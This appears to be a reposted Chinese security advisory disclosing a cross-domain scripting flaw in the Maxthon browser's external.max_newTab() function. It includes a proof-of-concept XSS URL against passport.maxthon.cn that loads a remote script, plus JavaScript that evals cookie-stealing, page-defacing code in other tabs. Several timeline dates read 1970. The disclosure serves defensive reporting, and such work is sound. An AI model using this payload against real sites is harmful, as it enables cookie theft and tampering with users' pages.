遨游浏览器跨域域漏洞利用

漏洞详情

披露状态:

2010-07-21: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-04: 细节向第三方安全合作伙伴开放
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2010-08-21: 细节向公众公开

简要描述:

傲游浏览器是符合中国人使用习惯的多标签浏览器,拥有业界最优秀的在线收藏和广告过滤功能 。遨游浏览器在架构设计上存在一个安全缺陷,同时结合自身接口函数的安全问题,可以突破浏览器同源策略,导致一个跨域脚本漏洞。

详细说明:

遨游浏览器一个external接口函数没有遵循同源策略,存在一个跨域脚本漏洞。
漏洞函数external.max_newTab(),函数的功能是打开一个新的标签页。该函数存在一个时间竞争条件错误,可以突破同源策略跨域操作窗口对象,跨域执行任意脚本。
同时遨游浏览器自定义开发的external接口函数设定了一个信任域,该信任域包括*.maxthon.cn等,结合*.maxthon.cn任意web应用的一个脚本漏洞就可以调用漏洞函数external.max_newTab()执行跨域操作。

漏洞证明:

POC:
1. passport.maxthon.cn存在一个跨站脚本漏洞,通过跨站脚本漏洞可以调用漏洞函数,嵌入一个远程的js http://127.0.0.1/vul.js
http://passport.maxthon.cn/new/register_account.html?account="><script/src=http://127.0.0.1/vul.js></script>
2.调用漏洞函数的javascript脚本

hijack_code = "alert(document.cookie);document.write('hacked by rayh4c#80sec.com')"
t1 = external.max_newTab("a",'http://www.sina.com/',"activate:yes")
t2 = external.max_newTab("b",'http://www.baidu.com/',"activate:yes")
t3 = external.max_newTab("a",'http://www.sohu.com/',"activate:yes")
setInterval("t1.eval(hijack_code)",1)
setInterval("t2.eval(hijack_code)",2)
setInterval("t3.eval(hijack_code)",3)


危害结果:
新打开的三个标签页窗口将随机命中一个窗口跨域注入脚本运行,如百度网页被读取COOKIE并篡改网页。

修复方案:

1.修复*.maxthon.cn域名内的WEB应用漏洞。
2.修复有漏洞的接口函数external.max_newTab()。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值